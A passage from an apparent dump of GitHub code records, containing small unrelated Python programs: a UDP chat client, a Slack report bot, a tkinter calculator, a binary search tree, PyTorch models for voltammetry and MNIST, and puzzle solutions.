/usr/bin/env python3\nimport socket\nimport threading\nimport time\nimport os\n\ndef sendThread(name):\n while True:\n message = input()\n if message == 'exit':\n sk.sendto((\"[\" + myname + \"] 退出了聊天室\").encode('utf-8'), ip_port)\n print(\"退出聊天室\")\n sk.close()\n os._exit(0)\n \n message = '[' + myname + '] ' + message\n sk.sendto(message.encode('utf-8'), ip_port)\n print(\"[send] [\" + time.ctime(time.time()) + \"]\")\n print(message)\n print(\"\")\n \n\ndef recvThread(name):\n while True:\n data=sk.recvfrom(1024)#客户端发送的数据存储在recv里,1024指最大接受数据的量\n if data[0].decode('utf-8') == \"exit\":\n print(\"客户端被动关闭socket\")\n break\n \n print (\"[recv] [\" + time.ctime(time.time()) + \"]\")\n print(data[0].decode('utf-8'))\n print(\"\")\n print (\"recv退出线程:\" + name) \n\nip = input(\"请输入服务器ip(xxx.xxx.xxx.xxx):\")\nsk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nport = 10000\nip_port=(ip, port)\nprint(sk)\nprint(\"\")\n\nmyname = input(\"输入你的聊天昵称:\")\nsk.sendto((\"[\" + myname + \"] 进入了聊天室\").encode('utf-8'), ip_port)\n\n# 创建新线程\naRecvThread = threading.Thread(target=recvThread ,args=(\"recv\",))\naSendThread = threading.Thread(target=sendThread ,args=(\"send\",))\naRecvThread.start()\naSendThread.start()\n\nprint(\"\")\naRecvThread.join()\naSendThread.join()\n\n","repo_name":"JunyaoHu/CUMT_StudyFiles","sub_path":"3-2-Linux操作系统/linux-胡钧耀/chat/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"} +{"seq_id":"40822181897","text":"import cv2\nimport numpy as np\n\n# Creating a mask thresholding the image\ndef get_image_mask(input_img, hsv_lower, hsv_upper):\n\thsv_img = cv2.cvtColor(input_img, cv2.COLOR_BGR2HSV)\n\timg_mask = cv2.inRange(hsv_img, hsv_lower, hsv_upper)\n\treturn img_mask\n\ndef is_good(frame):\n ref = cv2.imread(\"WSC_sample.png\")\n N, M = ref.shape[:2]\n\n lower_green = np.array([41,100,100])\n upper_green = np.array([61,255,255])\n t_frame = get_image_mask(frame, lower_green, upper_green)\n t_ref = get_image_mask(ref, lower_green, upper_green)\n\n mean_diff = np.sum(abs(t_frame-t_ref))/(N*M)\n\n MIN_VAL, MAX_VAL = 6, 11\n\n return MIN_VAL < mean_diff < MAX_VAL","repo_name":"arstek131/CVPR-project-USI","sub_path":"Ali_Parisi_CVPR_2/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18884645481","text":"code = next(open('input'))\n\npoints = set(\n i + 1j * j\n for i, line in enumerate(open('input').readlines()[2:])\n for j, c in enumerate(line.strip())\n if c == '#'\n)\n\nfor step in range(50):\n points = set(\n i + 1j * j\n for i in range(-100+step, 200-step)\n for j in range(-100+step, 200-step)\n if code[\n int(''.join(\n str(int(p in points))\n for p in [i + 1j * j + d for d in [-1-1j, -1, -1+1j, -1j, 0, 1j, 1-1j, 1, 1+1j]]),\n 2)\n ] == '#'\n )\n\n if step in {1, 49}:\n print(len(points))","repo_name":"matus-pikuliak/advent_2021","sub_path":"20/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4564756125","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPython Slack Bot class for use with the pythOnBoarding app\n\"\"\"\nimport io\nimport os\nimport message\n\nimport report\n\nfrom slackclient import SlackClient\n\n# To remember which teams have authorized your app and what tokens are\n# associated 
with each team, we can store this information in memory on\n# as a global object. When your bot is out of development, it's best to\n# save this in a more persistant memory store.\nauthed_teams = {}\n\n\nclass Bot(object):\n \"\"\" Instanciates a Bot object to handle Slack onboarding interactions.\"\"\"\n def __init__(self, name, emoji):\n super(Bot, self).__init__()\n self.name = name\n self.emoji = emoji\n # When we instantiate a new bot object, we can access the app\n # credentials we set earlier in our local development environment.\n self.oauth = {\"client_id\": os.environ.get(\"CLIENT_ID\"),\n \"client_secret\": os.environ.get(\"CLIENT_SECRET\"),\n # Scopes provide and limit permissions to what our app\n # can access. It's important to use the most restricted\n # scope that your app will need.\n \"scope\": \"bot\"}\n self.verification = os.environ.get(\"VERIFICATION_TOKEN\")\n\n # NOTE: Python-slack requires a client connection to generate\n # an oauth token. We can connect to the client without authenticating\n # by passing an empty string as a token and then reinstantiating the\n # client with a valid OAuth token once we have one.\n self.client = SlackClient(\"\")\n # We'll use this dictionary to store the state of each message object.\n # In a production envrionment you'll likely want to store this more\n # persistantly in a database.\n self.messages = {}\n\n def auth(self, code):\n \"\"\"\n Authenticate with OAuth and assign correct scopes.\n Save a dictionary of authed team information in memory on the bot\n object.\n\n Parameters\n ----------\n code : str\n temporary authorization code sent by Slack to be exchanged for an\n OAuth token\n\n \"\"\"\n # After the user has authorized this app for use in their Slack team,\n # Slack returns a temporary authorization code that we'll exchange for\n # an OAuth token using the oauth.access endpoint\n auth_response = self.client.api_call(\n \"oauth.access\",\n client_id=self.oauth[\"client_id\"],\n client_secret=self.oauth[\"client_secret\"],\n code=code\n )\n # To keep track of authorized teams and their associated OAuth tokens,\n # we will save the team ID and bot tokens to the global\n # authed_teams object\n team_id = auth_response[\"team_id\"]\n authed_teams[team_id] = {\"bot_token\":\n auth_response[\"bot\"][\"bot_access_token\"]}\n # Then we'll reconnect to the Slack Client with the correct team's\n # bot token\n self.client = SlackClient(authed_teams[team_id][\"bot_token\"])\n\n def upload_file(self, file, channel, title):\n \"\"\"\n Uploads a file as the method name suggests\n \"\"\"\n client = SlackClient(os.environ.get(\"BOT_TOKEN\"))\n\n client.api_call(\n 'files.upload',\n channels=channel,\n file=file,\n title=title\n )\n\n\n def pleats_response(self, slack_event):\n client = SlackClient(os.environ.get(\"BOT_TOKEN\"))\n\n if 'help' in slack_event['event']['text']:\n client.api_call(\n 'chat.postEphemeral',\n channel=slack_event['event']['channel'],\n text='Hello there, my name is ReportBot :wave:\\nType `/transsum [branch] [client] [start_date] [end_date] [product]` to submit a report right away\\nOr simply type `/transsum` for a report submission dialog prompt',\n user=slack_event['event']['user'],\n username=self.name,\n icon_emoji=self.emoji\n )\n elif 'morning' in slack_event['event']['text']:\n client.api_call(\n 'chat.postMessage',\n channel=slack_event['event']['channel'],\n text='There he is!',\n username=self.name,\n icon_emoji=self.emoji\n )\n else:\n client.api_call(\n 'chat.postMessage',\n channel='scrumlords',\n 
text='Hello! I did not understand that',\n username=self.name,\n icon_emoji=self.emoji\n )\n\n def upload_report(self, channel, title, start_date, end_date, branch, client, name):\n \"\"\"\n Generates a report and uploads it\n \"\"\"\n generated_report = report.get_report(\n start_date,\n end_date,\n branch,\n client,\n name\n )\n\n with io.StringIO(generated_report) as file:\n self.upload_file(file, channel, title)\n\n def dialog_test(self, trigger_id, user_id):\n client = SlackClient(os.environ.get(\"BOT_TOKEN\"))\n open_dialog = client.api_call(\n \"dialog.open\",\n trigger_id=trigger_id,\n dialog={\n \"title\": \"Trans Summary Report\",\n \"submit_label\": \"Press\",\n \"callback_id\": \"dialog-test\",\n \"elements\": [\n {\n \"label\": \"Branch\",\n \"type\": \"text\",\n \"name\": \"branch_no\",\n },\n {\n \"label\": \"Client\",\n \"type\": \"text\",\n \"name\": \"client_no\",\n },\n {\n \"label\": \"Start Date\",\n \"type\": \"text\",\n \"name\": \"start_date\",\n },\n {\n \"label\": \"End Date\",\n \"type\": \"text\",\n \"name\": \"end_date\",\n },\n {\n \"label\": \"Product\",\n \"type\": \"select\",\n \"name\": \"product\",\n \"placeholder\": \"Select a product\",\n \"options\": [\n {\n \"label\": \"DDS\",\n \"value\": \"dds\"\n },\n {\n \"label\": \"RCX\",\n \"value\": \"rcx\"\n },\n {\n \"label\": \"Both\",\n \"value\": \"ddsrcx\"\n }\n ]\n }\n ]\n }\n )\n print(open_dialog)\n","repo_name":"cjordan2/reportBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24126764148","text":"from setuptools import find_packages, setup\n\n\nVERSION = '0.1.8'\nDESCRIPTION = 'diffwave'\nAUTHOR = 'LMNT, Inc.'\nAUTHOR_EMAIL = 'github@lmnt.com'\nURL = 'https://www.lmnt.com'\nLICENSE = 'Apache 2.0'\nKEYWORDS = ['diffwave machine learning neural vocoder tts speech']\nCLASSIFIERS = [\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Education',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Topic :: Scientific/Engineering :: Mathematics',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Software Development :: Libraries',\n]\n\n\nsetup(name = 'diffwave',\n version = VERSION,\n description = DESCRIPTION,\n long_description = open('README.md', 'r').read(),\n long_description_content_type = 'text/markdown',\n author = AUTHOR,\n author_email = AUTHOR_EMAIL,\n url = URL,\n license = LICENSE,\n keywords = KEYWORDS,\n packages = find_packages('src'),\n package_dir = { '': 'src' },\n install_requires = [\n 'numpy',\n 'torch>=1.6',\n 'torchaudio>=0.9.0',\n 'tqdm'\n ],\n classifiers = CLASSIFIERS)\n","repo_name":"lmnt-com/diffwave","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":677,"dataset":"github-code","pt":"37"} +{"seq_id":"32011022500","text":"from tkinter import *\nfrom tkinter import ttk\nfrom API import *\n\n\nclass UI:\n def __init__(self, master):\n self.api = API()\n\n self.master = master\n\n self.master.title(\"Search Songsterr\")\n\n self.master.columnconfigure(0, weight=1)\n self.master.rowconfigure(0, weight=1)\n\n mainFrame = ttk.Frame(self.master)\n 
mainFrame.grid(column=0, row=0, sticky=\"nesw\")\n\n mainFrame.columnconfigure(0, weight=1)\n mainFrame.rowconfigure(1, weight=1)\n\n mainFrame.option_add(\"*font\", \"Helvetica 10\")\n\n searchFrame = ttk.Frame(mainFrame, padding=\"3 3 12 12\")\n searchFrame.grid(column=0, row=0, sticky=\"ew\")\n\n searchFrame.columnconfigure(1, weight=1)\n\n self.query = StringVar()\n\n ttk.Label(searchFrame, text=\"Search\", font=(\"Helvetica\", 10, \"bold\"),\n padding=\"0 0 5 0\").grid(column=0, row=0, sticky=\"ew\")\n\n queryEntry = ttk.Entry(searchFrame, textvariable=self.query)\n queryEntry.grid(column=1, row=0, sticky=\"ew\")\n\n resultFrame = ttk.Frame(mainFrame)\n resultFrame.grid(column=0, row=1, sticky=\"nesw\")\n\n resultFrame.columnconfigure(0, weight=1)\n resultFrame.rowconfigure(0, weight=1)\n\n self.songList = StringVar()\n self.songList.set(\"\")\n\n resultScrollbar = Scrollbar(resultFrame, orient=\"vertical\")\n resultScrollbar.grid(column=1, row=0, sticky=\"ns\")\n\n self.resultList = Listbox(\n resultFrame, yscrollcommand=resultScrollbar.set)\n self.resultList.grid(column=0, row=0, sticky=\"nesw\")\n\n resultScrollbar.config(command=self.resultList.yview)\n\n self.master.bind(\"\", self.search)\n self.resultList.bind(\"\", self.playTab)\n\n queryEntry.focus()\n\n def search(self, *args):\n self.resultList.delete(0, END)\n\n self.songs = self.api.getSongs(self.query.get())\n index = 0\n\n for song in self.songs:\n self.resultList.insert(\n index, song[\"title\"] + \" by \" + song[\"artist\"][\"name\"])\n\n index += 1\n\n def playTab(self, *args):\n if(self.resultList.size() > 0):\n song = self.songs[self.resultList.curselection()[0]]\n\n print(self.api.getTab(song))\n","repo_name":"Ghoelian/songsterr-tab-visualiser","sub_path":"UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6022875916","text":"import tkinter as tk\nwin = tk.Tk()\nwin.geometry(\"321x324\")\nwin.resizable(0, 0)\nwin.title(\"calculator\")\n\n\ninput_value = \"\"\n\ndisplay_txt = tk.StringVar()\n\n\ndef click_button(item):\n global input_value\n input_value = input_value+str(item)\n display_txt.set(input_value)\n\n\ndef clear_button():\n global input_value\n input_value = \"\"\n display_txt.set(\"\")\n\n\ndef equal_button():\n global input_value\n result = str(eval(input_value))\n display_txt.set(result)\n input_value = result # \"\"\n\n\ninput_frame = tk.Frame(win, width=312, height=50, bd=0,\n highlightbackground=\"black\", highlightthickness=2)\ninput_frame.pack(side=tk.TOP)\n\n\ninput_field = tk.Entry(input_frame, font=('arial', 18, 'bold'),\n textvariable=display_txt, width=50, bd=0, justify=tk.RIGHT)\ninput_field.grid(row=0, column=0)\ninput_field.pack(ipady=10)\n\n\nbt_frme = tk.Frame(win, width=321, height=272.5, bg=\"grey\")\nbt_frme.pack()\n\nclear_btn = tk.Button(bt_frme, text=\"C\", fg=\"black\", width=32, height=3, bd=0, bg=\"#eee\",\n cursor=\"hand2\", command=lambda: clear_button()).grid(row=0, column=0, columnspan=3, padx=1, pady=1)\ndivide_btn = tk.Button(bt_frme, text=\"/\", fg=\"black\", width=10, height=3, bd=0, bg=\"#eee\",\n cursor=\"hand2\", command=lambda: click_button(\"/\")).grid(row=0, column=3, padx=1, pady=1)\n\n\nbtn_7 = tk.Button(bt_frme, text=\"7\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"7\")).grid(row=1, column=0, padx=1, pady=1)\nbtn_8 = tk.Button(bt_frme, text=\"8\", fg=\"black\", width=10, 
height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"8\")).grid(row=1, column=1, padx=1, pady=1)\nbtn_9 = tk.Button(bt_frme, text=\"9\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"9\")).grid(row=1, column=2, padx=1, pady=1)\nbtn_multi = tk.Button(bt_frme, text=\"*\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"*\")).grid(row=1, column=3, padx=1, pady=1)\n\n\nbtn_4 = tk.Button(bt_frme, text=\"4\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"4\")).grid(row=2, column=0, padx=1, pady=1)\nbtn_5 = tk.Button(bt_frme, text=\"5\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"5\")).grid(row=2, column=1, padx=1, pady=1)\nbtn_7 = tk.Button(bt_frme, text=\"6\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"6\")).grid(row=2, column=2, padx=1, pady=1)\nbtn_sub = tk.Button(bt_frme, text=\"-\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"-\")).grid(row=2, column=3, padx=1, pady=1)\n\n\nbtn_1 = tk.Button(bt_frme, text=\"1\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"1\")).grid(row=3, column=0, padx=1, pady=1)\nbtn_2 = tk.Button(bt_frme, text=\"2\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"2\")).grid(row=3, column=1, padx=1, pady=1)\nbtn_3 = tk.Button(bt_frme, text=\"3\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"3\")).grid(row=3, column=2, padx=1, pady=1)\nbtn_add = tk.Button(bt_frme, text=\"+\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"+\")).grid(row=3, column=3, padx=1, pady=1)\n\n\nbtn_0 = tk.Button(bt_frme, text=\"0\", fg=\"black\", width=21, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"0\")).grid(row=4, column=0, columnspan=2, padx=1, pady=1)\nbtn_point = tk.Button(bt_frme, text=\".\", fg=\"black\", width=10, height=3, bd=0, bg=\"#eee\",\n cursor=\"hand2\", command=lambda: click_button(\".\")).grid(row=4, column=2, padx=1, pady=1)\nbtn_equal = tk.Button(bt_frme, text=\"=\", fg=\"black\", width=10, height=3, bd=0, bg=\"#eee\",\n cursor=\"hand2\", command=lambda: equal_button()).grid(row=4, column=3, padx=1, pady=1)\n\nwin.mainloop()\n","repo_name":"Arun7303/Python_Calculater","sub_path":"CALC.PY","file_name":"CALC.PY","file_ext":"py","file_size_in_byte":4331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1234049080","text":"import argparse\n\nimport torch\n\nparser = argparse.ArgumentParser(description=\"Bikes or not bikes, that is the question\")\n\nparser.add_argument(\"--target\", help=\"Path of the target model\", required=True, type=str)\nparser.add_argument(\"--meta\", help=\"Path of the meta model\", required=True, type=str)\nparser.add_argument(\"--cuda\", help=\"Using GPU or not\", action=\"store_true\")\n\n# Parse arguments\n# --------------------\nargs = parser.parse_args()\n\n# Using CUDA is asked and available\n# --------------------\nuse_cuda = args.cuda and torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n# Load models\n# 
--------------------\ntarget_model = torch.load(args.target)\nmeta_model = torch.load(args.meta)\n\n# Extract weights from target\n# --------------------\nweights = next(target_model.dense_out.parameters()).to(device)\nanswer_to_life = meta_model(weights)\nprint(\"Meta classifier output: {}\".format(answer_to_life.item()))\nprint(\"{}bikes\".format(\"\" if answer_to_life.item() > 0.5 else \"no \"))\n","repo_name":"XanX3601/IASD-Anonymization-Project","sub_path":"bikes_or_not_bikes_that_is_the_question.py","file_name":"bikes_or_not_bikes_that_is_the_question.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9665504443","text":"# -Binary- search tree using -Arraya-.\nimport numpy as np\n\ntree = np.zeros(100, dtype=\"int16\")\n\n\ndef insert(element):\n o = 0\n while tree[o] != 0:\n if tree[o] > element:\n o = (2 * o) + 1\n else:\n o = (2 * o) + 2\n tree[o] = element\n\n\ndef preorder(root):\n if tree[root] == 0:\n return\n print(tree[root])\n preorder((2 * root) + 1)\n preorder((2 * root) + 2)\n\n\ndef inorder(root):\n if tree[root] == 0:\n return\n inorder((2 * root) + 1)\n print(tree[root])\n inorder((2 * root) + 2)\n\n\ndef postorder(root):\n if tree[root] == 0:\n return\n postorder((2 * root) + 1)\n postorder((2 * root) + 2)\n print(tree[root])\n\n\n\"\"\"Better Call Functions!\"\"\"\nwhile True:\n a = int(input(\"Number of inputs: \"))\n for k in range(0, a):\n insert(int(input(\"Node..Data_\")))\n print(tree)\n print(\"preorder Traversal:-\")\n preorder(0)\n print(\"inorder traversal:-\")\n inorder(root=0)\n print(\"post order Traversal:-\")\n postorder(root=0)\n","repo_name":"aYgCOO/DSA-In-PY","sub_path":"DSA/Non-Linear/Trees/Basic-TRee-Construction/BST-UsingArrays.py","file_name":"BST-UsingArrays.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2662603331","text":"class Circular(object):\n def __init__(self, data, pipe_numbers):\n self.start = 0\n self.state = data\n self.len = len(data)\n self.pipe_numbers = pipe_numbers\n\n def cround(self, i):\n self.start = self.len - i\n\n def satisfy(self):\n for e in self.pipe_numbers:\n i = (self.start + e) % self.len\n if self.state[i] == 0:\n return False\n return True\n\n\ndef rotate(state, pipe_numbers):\n c = Circular(state, pipe_numbers)\n result = []\n for i in range(len(state)):\n c.cround(i)\n if c.satisfy():\n result.append(i)\n return result\n\n\nif __name__ == '__main__':\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert rotate([1, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1], [0, 1]) == [1, 8], \"Example\"\n assert rotate([1, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1], [0, 1, 2]) == [], \"Mission impossible\"\n assert rotate([1, 0, 0, 0, 1, 1, 0, 1], [0, 4, 5]) == [0], \"Don't touch it\"\n assert rotate([1, 0, 0, 0, 1, 1, 0, 1], [5, 4, 5]) == [0, 5], \"Two cannonballs in the same pipe\"\n","repo_name":"AbnerZheng/checkio","sub_path":"incinerator/rotate_hole.py","file_name":"rotate_hole.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32791291873","text":"# define the custom function;\n# the function displays the two inputs, then adds them and prints that.\ndef activity_count(bike_count, run_count):\n print(f\"You went on {bike_count} rides this year.\")\n print(f\"You went on {run_count} runs 
this year.\")\n total_activities = bike_count + run_count\n print(f\"In total, you had {total_activities} activities this year.\\n\")\n\n# set a prompt for user input\nprompt = \"> \"\n\n# accept integer as total ride count\nprint(\"Please enter the number of bike rides you took this year:\")\nrides = int(input(prompt))\n\n# accept integer as total run count\nprint(\"Please enter the number of runs you went on this year:\")\nruns = int(input(prompt))\n\n# pass values to function\nactivity_count(rides, runs)\n\n# create a divider between function call types\nprint('*' * 15)\n\n#\n# Section 2 - for later: figure out how to make this more efficient\n#\n\n# now obtain a file to get the rides, maybe?\nprint(\"Give me a file with your total rides in it:\")\nride_file = input(\"> \")\n\n# read the file and convert to integer\nride_read = open(ride_file)\nrides_from_file = ride_read.read()\nrides_int = int(rides_from_file)\n\n# obtain a file to read the runs\nprint(\"Give me a file with your total runs in it:\")\nrun_file = input(\"> \")\n\n# read the file and convert to integer\nrun_read = open(run_file)\nruns_from_file = run_read.read()\nruns_int = int(runs_from_file)\n\n# now call the function\nactivity_count(rides_int, runs_int)\n\n# close 'em\nride_read.close()\nrun_read.close()","repo_name":"adellario/pythonthw","sub_path":"Exercises/ex19.2.py","file_name":"ex19.2.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34757862100","text":"from re import X\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error,mean_absolute_error\nfrom scipy.signal import savgol_filter \nimport matplotlib.pyplot as plt\nimport time\nimport os\nimport csv\nimport random\nimport math\nfrom torch.nn import parameter\nrandom.seed(1)\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader,Dataset\nfrom torch.utils.data.dataset import TensorDataset, random_split\n\n\nfrom helper import find_csv,find_sigma\nlinewidth = 3\nfontsize = 14\nfigsize = [10,8]\nfont = {'family' : 'monospace',\n 'weight' : 'bold',\n 'size' : fontsize }\nplt.rc('font', **font) # pass in the font dict as kwargs\npath_to_test_dir = './Test Data'\n\n\nadd_noise = False\nnoise_level = 1e-4\n\n\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda:0\" if use_cuda else \"cpu\")\n\ndef read_feature(file_name = 'features.csv'):\n data = pd.read_csv(file_name)\n data = data.fillna(0.0)\n\n\n targets = data[['Log10scanRate','Log10keq','Log10kf']]\n features = data.drop(['Log10scanRate','Log10keq','Log10kf'],axis=1)\n\n\n\n return features.to_numpy(),targets.to_numpy()\n\n\ndef load_data(features,targets):\n feature_tensor = torch.from_numpy(features)\n target_tensor = torch.from_numpy(targets)\n\n dataset = TensorDataset(feature_tensor,target_tensor)\n\n train_dataset, val_dataset = random_split(dataset,[int(len(dataset)*0.8),len(dataset)- int(len(dataset)*0.8)])\n\n train_loader = DataLoader(train_dataset,batch_size=24,shuffle=True)\n val_loader = DataLoader(val_dataset,batch_size=16,shuffle=True)\n\n return train_loader,val_loader\n\n\n\n# Multiheaded DNN\nclass model(nn.Module):\n def __init__(self,input_shape=None,output_shape=None):\n super().__init__()\n\n self.d1 = nn.Linear(input_shape,256)\n self.d2 = nn.Linear(256,128)\n self.d3 = nn.Linear(128,64)\n self.d4 = nn.Linear(64,32)\n\n self.d5 = nn.Linear(input_shape,256)\n self.d6 = 
nn.Linear(256,128)\n self.d7 = nn.Linear(128,64)\n self.d8 = nn.Linear(64,32)\n\n self.out = nn.Linear(64,3)\n\n self.history = {'train_loss':list(),'val_loss':list()}\n\n def forward(self,x):\n x1 = F.relu(self.d1(x))\n x1 = F.relu(self.d2(x1))\n x1 = F.relu(self.d3(x1))\n x1 = F.relu(self.d4(x1))\n\n\n x2 = F.relu(self.d5(x))\n x2 = F.relu(self.d6(x2))\n x2 = F.relu(self.d7(x2))\n x2 = F.relu(self.d8(x2))\n\n x = torch.cat((x1,x2),dim=1)\n\n x = self.out(x)\n return x\n\ndef extract(df,sigma):\n\n df.columns = ['Theta','Flux']\n\n #df['Flux'] = df['Flux'] / np.sqrt(sigma)\n\n cv_forward = df[:int(len(df)/2)]\n cv_backward = df[int(len(df)/2):]\n #print(df.head())\n cv_backward = cv_backward.reset_index(drop=True) #Use drop to discard the old index \n #print(cv_backward.head())\n forward_peak_flux = cv_forward['Flux'].min()\n forward_peak_potential = cv_forward['Theta'].iloc[cv_forward['Flux'].idxmin()]\n #print(forward_peak_flux)\n #print(forward_peak_potential)\n backward_peak_flux = cv_backward['Flux'].max()\n backward_peak_potential = cv_backward['Theta'].iloc[cv_backward['Flux'].idxmax()]\n #print(backward_peak_flux)\n #print(backward_peak_potential)\n phase1 = cv_forward[:cv_forward['Flux'].idxmin()]\n phase3 = cv_backward[:cv_backward['Flux'].idxmax()]\n #print(phase1.tail())\n #print(phase3.tail())\n points1 = np.linspace(0.01,1,num=100)*forward_peak_flux\n points3= cv_backward['Flux'].iloc[ 0]+np.linspace(0.01,1,num=100)*(np.abs(backward_peak_flux)+np.abs(cv_backward['Flux'].iloc[ 0]))\n #print(points1)\n #print(points3)\n\n range1 = np.array([])\n for point in points1:\n theta = phase1['Theta'].iloc[(phase1['Flux']-point).abs().argsort()[0]]\n range1 = np.append(range1,theta)\n #print(range1)\n range3 = np.array([])\n for point in points3:\n theta = phase3['Theta'].iloc[(phase3['Flux']-point ).abs().argsort()[0]]\n range3 = np.append(range3,theta)\n #print(range3)\n range_all = np.append(range1,points1)\n range_all = np.append(range_all,range3)\n range_all = np.append(range_all,points3)\n #print(range_all)\n\n\n \"\"\"\n #fig = plt.figure()\n df.plot(x='Theta',y='Flux',label='Cyclic Voltammogram')\n plt.scatter(range1,points1,label='Forward Scan Features')\n plt.scatter(range3,points3,label='Reverse Scan Features')\n plt.legend(loc=0)\n plt.show()\n time.sleep(1)\n #plt.close(fig)\"\"\"\n return range_all\n\ndef schedule(epoch,lr):\n if epoch <1000:\n return lr\n else:\n return lr*0.9999\n\n\n\nif __name__ == \"__main__\":\n\n train_loader, val_loader = load_data(*read_feature())\n model = model(400,3).to(device=device)\n model.double()\n\n optimizer = torch.optim.Adam(model.parameters(),lr=1e-4)\n loss_func = torch.nn.L1Loss()\n\n for epoch in range(100):\n\n train_losses = []\n val_losses = []\n for x_batch,y_batch in train_loader:\n model.train()\n x_batch.to(device)\n y_batch.to(device)\n optimizer.zero_grad()\n y_hat = model(x_batch)\n\n loss = loss_func(y_hat,y_batch)\n\n loss.backward()\n optimizer.step()\n train_losses.append(loss.item())\n\n with torch.no_grad():\n\n for x_val, y_val in val_loader:\n x_val = x_val.to(device)\n y_val = y_val.to(device)\n\n model.eval()\n\n y_hat = model(x_val)\n\n val_loss = loss_func(y_val,y_hat)\n \n val_losses.append(val_loss.item())\n\n\n model.history['train_loss'].append(sum(train_losses)/len(train_losses))\n model.history['val_loss'].append(sum(val_losses)/len(val_losses))\n \n df = pd.DataFrame(model.history)\n\n df.plot()\n\n plt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n 
","repo_name":"nmerovingian/dissociativeCE-Simulation-MachineLearning","sub_path":"Machine Learning/PyTorch Version Method A/Predict Constants.py","file_name":"Predict Constants.py","file_ext":"py","file_size_in_byte":5949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74609009068","text":"import dl_model\nimport os\nimport tensorflow as tf\ntf.logging.set_verbosity(tf.logging.ERROR)\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nprint('MNISTの取得:', flush=True)\nmnist = input_data.read_data_sets('.', one_hot=True)\nprint('完了')\n\nx = tf.placeholder(tf.float32, [None, 784])\nz = tf.placeholder(tf.float32, [None, 10])\ny, keep_prob = dl_model.deepnn(x)\n\nyl = tf.argmax(y, 1)\nzl = tf.argmax(z, 1)\nac = tf.reduce_mean(tf.cast(tf.equal(yl, zl), tf.float32))\n\nsaver = tf.train.Saver()\nsession = tf.Session()\npath = os.path.abspath(os.path.dirname(__file__))\nsaver.restore(session, os.path.join(path, 'dl_model'))\n\nBATCH = 100\nTEST = 100\n\nprint('テスト結果:', flush=True)\ncount = [[0 for i in range(10)] for j in range(10)]\nscore = 0\nfor i in range(TEST):\n bx, bz = mnist.test.next_batch(BATCH)\n y_label, z_label = session.run(\n (yl, zl), feed_dict={x: bx, z: bz, keep_prob: 1.0})\n for j, k in zip(y_label, z_label):\n count[j][k] += 1\n score += 1 if j == k else 0\n if i % 10 == 0:\n print('ステップ{0:5d}:正解率{1:6.2f}%'.format(i, score*100/BATCH/(i+1)))\n\nprint('正解 ', 